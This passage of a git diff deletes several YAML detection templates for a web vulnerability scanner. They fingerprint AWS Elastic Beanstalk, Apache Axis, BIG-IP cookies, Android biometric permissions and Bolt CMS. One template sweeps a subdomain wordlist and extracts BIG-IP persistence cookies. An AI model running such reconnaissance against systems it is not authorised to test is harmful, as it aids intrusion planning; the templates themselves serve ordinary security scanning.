- - '
AWS Elastic Beanstalk overview'
- - 'AWS Elastic Beanstalk overview'
- condition: or
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '([A-Za-z -]+)<\/title>'
diff --git a/tmp/detect/axis-detect.yaml b/tmp/detect/axis-detect.yaml
deleted file mode 100644
index 62b102f0dd..0000000000
--- a/tmp/detect/axis-detect.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: axis-detect
-
-info:
- name: apache-axis-detect
- author: dogasantos
- severity: info
- verified: true
- description: Axis and Axis2 detection
-
-rules:
- r0:
- request:
- method: GET
- path: /axis2/
- expression: response.status == 200 && response.body.bcontains(b"Validate") && response.body.bcontains(b"Welcome") && response.body.bcontains(b"Axis") && response.body.bcontains(b"deployed") && response.body.bcontains(b"installation") && response.body.bcontains(b"Admin")
- r1:
- request:
- method: GET
- path: /axis/
- expression: response.status == 200 && response.body.bcontains(b"Validate") && response.body.bcontains(b"Welcome") && response.body.bcontains(b"Axis") && response.body.bcontains(b"deployed") && response.body.bcontains(b"installation") && response.body.bcontains(b"Admin")
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/detect/axis2-detect.yaml b/tmp/detect/axis2-detect.yaml
deleted file mode 100644
index ecd7d7e8bd..0000000000
--- a/tmp/detect/axis2-detect.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-id: axis2-detect
-info:
- name: Apache Axis2
- author: notnotnotveg
- severity: informative
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/axis2/services/listServices"
- - "{{BaseURL}}/dswsbobje/services/listServices"
- matchers:
- - type: word
- words:
- - "Service Description"
- part: body
diff --git a/tmp/detect/bigip-detection.yaml b/tmp/detect/bigip-detection.yaml
deleted file mode 100644
index af25594f0e..0000000000
--- a/tmp/detect/bigip-detection.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: bigip-detection
-
-info:
- name: BIGIP Cookie Detection
- author: PR3R00T
- severity: info
- reference:
- - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values
- - https://support.f5.com/csp/article/K23254150
- tags: bigip,tech
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- redirects: true
- matchers:
- - type: word
- part: header
- words:
- - 'BIGipServer~'
-
- extractors:
- - type: regex
- part: header
- group: 1
- regex:
- - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([!a-z0-9A-Z/.=]+)'
\ No newline at end of file
diff --git a/tmp/detect/biometric-detect-736.yaml b/tmp/detect/biometric-detect-736.yaml
deleted file mode 100644
index 4f2f86d771..0000000000
--- a/tmp/detect/biometric-detect-736.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: biometric-detect
-
-info:
- name: Biometric or Fingerprint detect
- author: gaurang
- severity: info
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "android.permission.USE_FINGERPRINT"
- - "android.permission.USE_BIOMETRIC"
\ No newline at end of file
diff --git a/tmp/detect/biometric-detect.yaml b/tmp/detect/biometric-detect.yaml
deleted file mode 100644
index b6f0a2b958..0000000000
--- a/tmp/detect/biometric-detect.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: biometric-detect
-info:
- name: Biometric or Fingerprint detect
- author: gaurang
- severity: info
-file:
- - extensions:
- - all
- matchers:
- - type: word
- words:
- - "android.permission.USE_FINGERPRINT"
- - "android.permission.USE_BIOMETRIC"
diff --git a/tmp/detect/bolt-cms-detect-760.yaml b/tmp/detect/bolt-cms-detect-760.yaml
deleted file mode 100644
index 8ce7ed1c9d..0000000000
--- a/tmp/detect/bolt-cms-detect-760.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: bolt-cms-detect
-
-info:
- name: bolt CMS detect
- author: cyllective
- severity: info
- description: Detects bolt CMS
- tags: tech,bolt,cms
- reference:
- - https://github.com/bolt/bolt
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/bolt/login"
-
- matchers:
- - type: word
- part: body
- condition: or
- words:
- - '